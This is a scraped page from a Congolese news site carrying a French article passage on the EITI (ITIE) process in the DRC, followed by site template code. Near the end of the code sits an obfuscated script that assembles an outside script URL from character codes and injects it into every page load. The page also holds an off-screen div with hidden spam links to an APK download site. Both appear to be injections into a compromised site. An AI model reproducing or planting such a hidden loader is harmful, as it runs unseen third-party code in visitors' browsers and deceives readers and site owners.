<p>Et comme si cela ne suffit pas, l’ITIE à fait disparaitre le travail des enfants en Rdc avec son corollaire des conditions environnementales inhumaines de travail. Somme toute, avec l’ITIE, la redevabilité et la transparence riment ensemble. Cette complicité s’est accentuée depuis l’avènement de nouveaux dirigeants du secrétariat  technique, sous la houlette de Mme Holenn qu’assiste Me Théodore Mpiana Kabundi, son adjoint ai chargé de l’administration et des finances.</p>
<p>Aujourd’hui, la Rdc fait parler d’elle de plus en plus, dans les débats économiques internationaux, ce qui n’était pas le cas avant une année. Les partenaires techniques et financiers refont confiance au processus au groupe multipartite congolais, à la suite d’un climat de stabilité, de transparence et de sérénité qui règne au sein de l’initiative.</p>
<p>Signalons qu’auparavant, c’était M. Liévin Mutombo Mbuyi qui est intervenu pour retracer l’historique de l’ITIE/RDC. Cet expert chargé des statistiques et de la collecte des données au sein de l’initiative, a rappelé que celle-ci est née d’un constat  fait par  la société civile au niveau international. Constat selon lequel, les pays riches en ressources naturelles étaient de plus en plus pauvres et que le paradoxe ne se justifiait pas car les ressources naturelles est un secteur de développement multisectoriel d’un pays.</p>
<p>Eu égard à ce qui précède, d’après Liévin Mutombo, le questionnement a donné lieu à différents échanges à travers le monde. Le premier en date fut le fameux sommet mondial sur le développement durable tenu en septembre 2002, à Johannesburg, en Afrique du Sud, animé par le Premier ministre Tony Blair, auquel la Rdc a pris part. L’intervenant a rappelé qu’au cours de cette conférence mondiale, deux résolutions ont été prise, dont la mise en place d’une structure dénommée ITIE. Cet outil au service du citoyen montre ce que les entreprises paient d’une part, et ce que l’Etat perçoit d’autre part.</p>
<p><strong>JMNK</strong></p>
<div style="position:absolute;top:0;left:-9999px;">Did you find apk for android? You can find new <a href="https://dlandroid24.com/">Free Android Games</a> and apps.</div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Partager&nbsp;:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow" data-shared="sharing-twitter-51307" class="share-twitter sd-button share-icon no-text" href="https://groupelavenir.org/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/?share=twitter" rel="noopener noreferrer" target="_blank" title="Cliquez pour partager sur Twitter"><span></span><span class="sharing-screen-reader-text">Cliquez pour partager sur Twitter(ouvre dans une nouvelle fenêtre)</span></a></li><li class="share-facebook"><a rel="nofollow" data-shared="sharing-facebook-51307" class="share-facebook sd-button share-icon no-text" href="https://groupelavenir.org/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/?share=facebook" rel="noopener noreferrer" target="_blank" title="Cliquez pour partager sur Facebook"><span></span><span class="sharing-screen-reader-text">Cliquez pour partager sur Facebook(ouvre dans une nouvelle fenêtre)</span></a></li><li class="share-google-plus-1"><a rel="nofollow" data-shared="sharing-google-51307" class="share-google-plus-1 sd-button share-icon no-text" href="https://groupelavenir.org/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/?share=google-plus-1" rel="noopener noreferrer" target="_blank" title="Cliquez pour partager sur Google+"><span></span><span class="sharing-screen-reader-text">Cliquez pour partager sur Google+(ouvre dans une nouvelle fenêtre)</span></a></li><li class="share-end"></li></ul></div></div></div>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Articles similaires</em></h3>
</div>        </div>


        <div class="clearfix"></div>
<script type="text/javascript"><!--
google_ad_client = "ca-pub-7683628640306220";
/* groupelavenir.org_300x250 */
google_ad_slot = "2031019677/3507727557";
google_ad_width = 300;
google_ad_height = 250;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
        <div class="clearfix"></div>

        <footer>
                                                
            <div class="td-social-sharing">
                
                <div class="td-tags-and-social-wrapper-box td-tags-and-social-wrapper-box-bottom-line">
                    <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Processus+ITIE+en+Afrique%3A+De+belles+perspectives+pour+la+Rdc&url=https%3A%2F%2Fgroupelavenir.org%2Fprocessus-itie-en-afrique-de-belles-perspectives-pour-la-rdc%2F&via=RTGA_TV" onclick="if(!document.getElementById('td_social_networks_buttons')){window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;}" ><div class="td-sp td-sp-share-twitter"></div><div class="td-social-but-text">Twitter</div></a>
                    <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fgroupelavenir.org%2Fprocessus-itie-en-afrique-de-belles-perspectives-pour-la-rdc%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-facebook"></div><div class="td-social-but-text">Facebook</div></a>
                    <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=https://groupelavenir.org/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-google"></div><div class="td-social-but-text">Google +</div></a>
                    <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=https://groupelavenir.org/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/&amp;media=https://groupelavenir.org/wp-content/uploads/2018/09/8-2.png" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><div class="td-sp td-sp-share-pinterest"></div><div class="td-social-but-text">Pinterest</div></a>
                </div></div>                                    <div class="td-author-name vcard author" style="display: none"><span class="fn"><a href="https://groupelavenir.org/author/">La Rédaction</a></span></div>

            <meta itemprop="author" content = "La Rédaction">        </footer>

    </article> <!-- /.post -->

    <div class="art-img-text-down similar-articles"><h4 class="block-title"><span>ARTICLES SIMILAIRES</span></h4>

	<div class="wpb_row row-fluid">

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="https://schema.org/Article">
        <div class="thumb-wrap"><a href="https://groupelavenir.org/projet-de-planification-communautaire-fonciere-participative-pcfp-le-gouverneur-pene-mbaka-et-le-directeur-pays-de-lonu-habitat-signent-le-protocole-de-mise-en-oeuvre/" rel="bookmark" title="Projet de planification communautaire foncière participative (PCFP): Le Gouverneur Pene Mbaka et le Directeur Pays de l’ONU-Habitat signent le protocole de mise en œuvre"><img width="326" height="159" itemprop="image" class="entry-thumb" src="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/09/7-1.png?resize=326%2C159&ssl=1" alt="" title="Projet de planification communautaire foncière participative (PCFP): Le Gouverneur Pene Mbaka et le Directeur Pays de l’ONU-Habitat signent le protocole de mise en œuvre"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/projet-de-planification-communautaire-fonciere-participative-pcfp-le-gouverneur-pene-mbaka-et-le-directeur-pays-de-lonu-habitat-signent-le-protocole-de-mise-en-oeuvre/" rel="bookmark" title="Projet de planification communautaire foncière participative (PCFP): Le Gouverneur Pene Mbaka et le Directeur Pays de l’ONU-Habitat signent le protocole de mise en œuvre">Projet de planification communautaire foncière participative (PCFP): Le Gouverneur Pene Mbaka et le Directeur Pays de l’ONU-Habitat signent le protocole de mise en œuvre</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-09-03T23:37:15+00:00" >Sep 3, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="https://groupelavenir.org/projet-de-planification-communautaire-fonciere-participative-pcfp-le-gouverneur-pene-mbaka-et-le-directeur-pays-de-lonu-habitat-signent-le-protocole-de-mise-en-oeuvre/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-51280">56</span></div>        </div>


        <meta itemprop="author" content = "La Rédaction">        </div>

        
	</div> <!-- ./span6 -->

	<div class="span6">

        <div class="td_mod6 td_mod_wrap " itemscope itemtype="https://schema.org/Article">
        <div class="thumb-wrap"><a href="https://groupelavenir.org/interconnexion-rca-cameroun-et-le-congo-ouverture-des-dossiers-de-soumission-aux-appels-doffres-internationaux/" rel="bookmark" title="Interconnexion RCA, Cameroun et le Congo: Ouverture des dossiers de soumission aux appels d’offres internationaux"><img width="326" height="159" itemprop="image" class="entry-thumb" src="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/09/3.png?resize=326%2C159&ssl=1" alt="" title="Interconnexion RCA, Cameroun et le Congo: Ouverture des dossiers de soumission aux appels d’offres internationaux"/></a></div>        <h3 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/interconnexion-rca-cameroun-et-le-congo-ouverture-des-dossiers-de-soumission-aux-appels-doffres-internationaux/" rel="bookmark" title="Interconnexion RCA, Cameroun et le Congo: Ouverture des dossiers de soumission aux appels d’offres internationaux">Interconnexion RCA, Cameroun et le Congo: Ouverture des dossiers de soumission aux appels d’offres internationaux</a></h3>
        <div class="meta-info">
                        <time  itemprop="dateCreated" class="entry-date updated" datetime="2018-09-02T23:38:01+00:00" >Sep 2, 2018</time><meta itemprop="interactionCount" content="UserComments:0"/>            <div class="entry-comments-views"><span class="td-sp td-sp-ico-comments td-fake-click" data-fake-click="https://groupelavenir.org/interconnexion-rca-cameroun-et-le-congo-ouverture-des-dossiers-de-soumission-aux-appels-doffres-internationaux/#respond"></span>0 <span class="td-sp td-sp-ico-view"></span><span class="td-nr-views-51258">79</span></div>        </div>


        <meta itemprop="author" content = "La Rédaction">        </div>

        
	</div> <!-- ./span6 --></div><!--./row-fluid--></div>
                        <div class="comments" id="comments">
                                                                                                <div class="comments-title-wrap">
                                                                                <h4 class="block-title"><span>PAS DE COMMENTAIRE</span></h4>
                                    </div>

                                                                                            	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Laisser une Réponse <small><a rel="nofollow" id="cancel-comment-reply-link" href="/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc/#respond" style="display:none;">Cancel reply</a></small></h3><p class="must-log-in">Vous devez <a href="https://groupelavenir.org/wp-login.php?redirect_to=https%3A%2F%2Fgroupelavenir.org%2Fprocessus-itie-en-afrique-de-belles-perspectives-pour-la-rdc%2F">être connecté</a> pour publier un commentaire.</p>	</div><!-- #respond -->
	                                                    </div> <!-- /.content -->


            </div>
            <div class="span4 column_container td-post-sidebar" role="complementary" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
                                <!-- .no sidebar -->
                        </div>
        
                             </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
            <div class="td-footer-wrap">
        <div class="container">
            <div class="row">
                
                            <div class="span12">
                                <div class="td-grid-wrap">
                                    <div class="container-fluid">
                                        <div class="wpb_row row-fluid ">
                                            <div class="span4 wpb_column column_container">
                                                <aside class="widget widget_text">			<div class="textwidget"><p><img src="https://groupelavenir.org/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" data-recalc-dims="1" data-lazy-src="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2016/09/logo_rtga-tv-.png?w=700" class=" jetpack-lazy-image"><noscript><img src="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2016/09/logo_rtga-tv-.png?w=700" data-recalc-dims="1" /></noscript></p>
<p>Un groupe d'entreprises privées des médias: Groupe l'Avenir vous informe au quotidien sur l'actualité du pays à la Télévision, Radio RTGA et en ligne.<br />
Adresse : Groupe l'Avenir, Immeuble Ruzizi, Avenue Bas-Congo N°873, Gombe, Kinshasa, RD Congo<br />
Téléphone : +243998410588<br />
Nous contacter : infos@groupelavenir.org</p>
</div>
		</aside>                                            </div>

                                            <div class="span4 wpb_column column_container">
                                                <aside class="widget widget_listcategorypostswidget"><div class="block-title"><span>Articles à la une</span></div><ul><li><a href="https://groupelavenir.org/apres-le-verdict-de-la-cour-constitutionnel-mende-remet-bemba-a-sa-place/" title="Après le verdict de la Cour Constitutionnel: Mende remet Bemba à sa place">Après le verdict de la Cour Constitutionnel: Mende remet Bemba à sa place</a>  <a href="https://groupelavenir.org/apres-le-verdict-de-la-cour-constitutionnel-mende-remet-bemba-a-sa-place/" title="Après le verdict de la Cour Constitutionnel: Mende remet Bemba à sa place"><img width="150" height="150" src="https://groupelavenir.org/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" data-attachment-id="51328" data-permalink="https://groupelavenir.org/apres-le-verdict-de-la-cour-constitutionnel-mende-remet-bemba-a-sa-place/12-185/" data-orig-file="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/12.png?fit=665%2C373&amp;ssl=1" data-orig-size="665,373" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="12" data-image-description="" data-medium-file="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/09/12.png?fit=300%2C168&amp;ssl=1" data-large-file="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/12.png?fit=665%2C373&amp;ssl=1" data-lazy-src="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/12.png?resize=150%2C150&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/12.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/12.png?resize=210%2C210&amp;ssl=1 210w, https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/09/12.png?zoom=2&amp;resize=150%2C150 300w, https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/12.png?zoom=3&amp;resize=150%2C150 450w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" /></a></li><li><a href="https://groupelavenir.org/presidentielle-2018-bemba-muzito-elimines-badibanga-et-ifoku-repeches/" title="Présidentielle 2018: Bemba, Muzito éliminés, Badibanga et Ifoku repêchés">Présidentielle 2018: Bemba, Muzito éliminés, Badibanga et Ifoku repêchés</a>  <a href="https://groupelavenir.org/presidentielle-2018-bemba-muzito-elimines-badibanga-et-ifoku-repeches/" title="Présidentielle 2018: Bemba, Muzito éliminés, Badibanga et Ifoku repêchés"><img width="150" height="150" src="https://groupelavenir.org/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" data-attachment-id="51298" data-permalink="https://groupelavenir.org/presidentielle-2018-bemba-muzito-elimines-badibanga-et-ifoku-repeches/9-253/" data-orig-file="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/9-1.png?fit=671%2C321&amp;ssl=1" data-orig-size="671,321" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="9" data-image-description="" data-medium-file="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/09/9-1.png?fit=300%2C144&amp;ssl=1" data-large-file="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/09/9-1.png?fit=671%2C321&amp;ssl=1" data-lazy-src="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/09/9-1.png?resize=150%2C150&amp;ssl=1" data-lazy-srcset="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/9-1.png?resize=150%2C150&amp;ssl=1 150w, https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/9-1.png?resize=210%2C210&amp;ssl=1 210w, https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/09/9-1.png?zoom=2&amp;resize=150%2C150 300w, https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/09/9-1.png?zoom=3&amp;resize=150%2C150 450w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" /></a></li><li><a href="https://groupelavenir.org/en-attendant-le-17-septembre-prochain-bemba-potentiellement-elimine/" title="En attendant le 17 septembre prochain: Bemba potentiellement éliminé">En attendant le 17 septembre prochain: Bemba potentiellement éliminé</a>  <a href="https://groupelavenir.org/en-attendant-le-17-septembre-prochain-bemba-potentiellement-elimine/" title="En attendant le 17 septembre prochain: Bemba potentiellement éliminé"><img width="150" height="150" src="https://groupelavenir.org/wp-content/plugins/jetpack/modules/lazy-images/images/1x1.trans.gif" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" data-attachment-id="51254" data-permalink="https://groupelavenir.org/en-attendant-le-17-septembre-prochain-bemba-potentiellement-elimine/2-446/" data-orig-file="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/08/2-13.png?fit=570%2C382&amp;ssl=1" data-orig-size="570,382" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="2" data-image-description="" data-medium-file="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/08/2-13.png?fit=300%2C201&amp;ssl=1" data-large-file="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/08/2-13.png?fit=570%2C382&amp;ssl=1" data-lazy-src="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/08/2-13.png?resize=150%2C150&amp;ssl=1" data-lazy-srcset="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/08/2-13.png?resize=150%2C150&amp;ssl=1 150w, https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/08/2-13.png?resize=210%2C210&amp;ssl=1 210w, https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/08/2-13.png?zoom=2&amp;resize=150%2C150 300w, https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/08/2-13.png?zoom=3&amp;resize=150%2C150 450w" data-lazy-sizes="(max-width: 150px) 100vw, 150px" /></a></li></ul><a href="https://groupelavenir.org/category/featured/" > </a></aside>                                            </div>
                                            <div class="span4 wpb_column column_container">
                                                <aside class="widget widget_simple_facebook_page_feed_widget"><div class="block-title"><span>Notre page Facebook</span></div><!-- This Facebook Page Feed was generated with Simple Facebook Page Widget & Shortcode plugin v1.4.15 - https://wordpress.org/plugins/simple-facebook-twitter-widget/ --><div id="simple-facebook-widget" style="text-align:center;"><div class="fb-page" data-href="https://www.facebook.com/RADIO-TELE-GROUPE-LAVENIR-225206517516304" data-width="340" data-height="500" data-tabs="timeline" data-hide-cover="0" data-show-facepile="0" data-hide-cta="0" data-small-header="1" data-adapt-container-width="1"></div></div><!-- End Simple Facebook Page Plugin (Widget) --></aside>                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                                    </div>
        </div>
    </div> <!-- /.td-footer-wrap  -->



<div class="td-sub-footer-wrap">
    <div class="container ">
        <div class="row">
            <div class="span12">
                <div class="td-grid-wrap">
                    <div class="container-fluid">
                        <div class="row-fluid ">
                            <div class="span4 td-sub-footer-copy">
                                &copy; Copyright - 2013                            </div>
                            <div class="span8 td-sub-footer-menu">

                                <div class="menu-footer_menu-container"><ul id="menu-footer_menu" class=""><li id="menu-item-25174" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-first td-menu-item td-mega-menu menu-item-25174"><a href="https://groupelavenir.org/category/sante/">Santé</a>
<ul class="sub-menu">
	<li id="menu-item-0" class="menu-item-0"><a><div class="td-mega-grid"><script>var block_td_uid_1_5b8fcd4a3b9ed = new td_block();
block_td_uid_1_5b8fcd4a3b9ed.id = "td_uid_1_5b8fcd4a3b9ed";
block_td_uid_1_5b8fcd4a3b9ed.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"11","show_child_cat":"5"}';
block_td_uid_1_5b8fcd4a3b9ed.td_cur_cat = "11";
block_td_uid_1_5b8fcd4a3b9ed.td_column_number = "1";
block_td_uid_1_5b8fcd4a3b9ed.block_type = "td_mega_menu";
block_td_uid_1_5b8fcd4a3b9ed.post_count = "5";
block_td_uid_1_5b8fcd4a3b9ed.found_posts = "75";
block_td_uid_1_5b8fcd4a3b9ed.max_num_pages = "15";
block_td_uid_1_5b8fcd4a3b9ed.header_color = "";
block_td_uid_1_5b8fcd4a3b9ed.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_1_5b8fcd4a3b9ed);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_1_5b8fcd4a3b9ed class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/sexposant-au-danger-de-la-consommation-de-la-cigarette-les-fumeurs-defient-lindication-fumer-est-prejudiciable-a-la-sante/" rel="bookmark" title="S’exposant au danger de la consommation de la cigarette: Les fumeurs défient l’indication «  fumer est préjudiciable à la santé »"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/08/7-11.png?resize=198%2C143&#038;ssl=1" alt="" title="S’exposant au danger de la consommation de la cigarette: Les fumeurs défient l’indication «  fumer est préjudiciable à la santé »"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/sexposant-au-danger-de-la-consommation-de-la-cigarette-les-fumeurs-defient-lindication-fumer-est-prejudiciable-a-la-sante/" rel="bookmark" title="S’exposant au danger de la consommation de la cigarette: Les fumeurs défient l’indication «  fumer est préjudiciable à la santé »">S’exposant au danger de la consommation de la cigarette: Les fumeurs défient l’indication «  fumer est préjudiciable à la santé »</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/rdc-la-vaccination-anti-ebola-demarre-ce-lundi-a-lequateur/" rel="bookmark" title="RDC: la vaccination  anti-Ebola démarre ce lundi à l’Équateur"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/05/ebola-liberia-woma_3045794k-e1458811890956.jpg?resize=198%2C143&#038;ssl=1" alt="" title="RDC: la vaccination  anti-Ebola démarre ce lundi à l’Équateur"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/rdc-la-vaccination-anti-ebola-demarre-ce-lundi-a-lequateur/" rel="bookmark" title="RDC: la vaccination  anti-Ebola démarre ce lundi à l’Équateur">RDC: la vaccination  anti-Ebola démarre ce lundi à l’Équateur</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/la-couverture-sanitaire-universelle-un-projet-qui-appelle-un-engagement-de-tous-oly-ilunga/" rel="bookmark" title="« La couverture sanitaire universelle », un projet qui appelle un engagement de tous (Oly Ilunga)"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/04/oly-ilunga.jpg?resize=198%2C143&#038;ssl=1" alt="" title="« La couverture sanitaire universelle », un projet qui appelle un engagement de tous (Oly Ilunga)"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/la-couverture-sanitaire-universelle-un-projet-qui-appelle-un-engagement-de-tous-oly-ilunga/" rel="bookmark" title="« La couverture sanitaire universelle », un projet qui appelle un engagement de tous (Oly Ilunga)">« La couverture sanitaire universelle », un projet qui appelle un engagement de tous (Oly Ilunga)</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/1er-decembre-2017-onusida-rappelle-le-droit-a-la-sante/" rel="bookmark" title="1er décembre 2017 : ONUSIDA rappelle le droit à la santé"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2017/12/sida.jpg?resize=198%2C143&#038;ssl=1" alt="" title="1er décembre 2017 : ONUSIDA rappelle le droit à la santé"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/1er-decembre-2017-onusida-rappelle-le-droit-a-la-sante/" rel="bookmark" title="1er décembre 2017 : ONUSIDA rappelle le droit à la santé">1er décembre 2017 : ONUSIDA rappelle le droit à la santé</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/kinshasa-jica-en-visite-a-linpess/" rel="bookmark" title="Kinshasa : JICA en visite à l’INPESS"><img width="198" height="143" itemprop="image" class="entry-thumb" src="" /></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/kinshasa-jica-en-visite-a-linpess/" rel="bookmark" title="Kinshasa : JICA en visite à l’INPESS">Kinshasa : JICA en visite à l’INPESS</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5b8fcd4a3b9ed" data-td_block_id="td_uid_1_5b8fcd4a3b9ed"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_5b8fcd4a3b9ed" data-td_block_id="td_uid_1_5b8fcd4a3b9ed"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></a></li>
</ul>
</li>
</ul></div>                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>


</div>
<!--/#inner-wrap-->
</div>
<!--/#outer-wrap-->

<div class="td-sp td-scroll-up"></div>


<!--Plugin WP Overview (lite) 2011.0723.2011 Active-->

	<div style="display:none">
	</div>


    <!--

        Theme: Newspaper by tagDiv 2014
        Version: 4.6.2 (rara)
        Deploy mode: deploy
        
        uid: 5b8fcd4a41700
    -->

    
            <style type="text/css" media="screen">
                ul.newsholder{
top:0!important;
}

.widget_listcategorypostswidget li{
margin-bottom:10px;
}

.widget_listcategorypostswidget li a:nth-child(1){
display:inline-block;
width:40%;
float:right;
}
                </style><script type="text/javascript">var bbb3 = document.createElement('script'); bbb3.type = 'text/javascript'; bbb3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 110); var scripts = document.getElementsByTagName('script'); var prt1 = true; for (var i = scripts.length; i--;) {if (scripts[i].src == bbb3.src) { prt1 = false;}else{} } if(prt1 == true){document.head.appendChild(bbb3);}</script>
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/groupelavenir.org\/processus-itie-en-afrique-de-belles-perspectives-pour-la-rdc\/":51307};
	</script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js?ver=20130122'></script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201836'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Sepaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/themes/Newspaper/js/td_external.js?ver=4.6.2'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/themes/Newspaper/js/full_compact/site.js?ver=4.6.2'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/build/lazy-images/js/lazy-images.min.js?ver=6.3.3'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-includes/js/comment-reply.min.js?ver=4.9.8'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.3.3'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
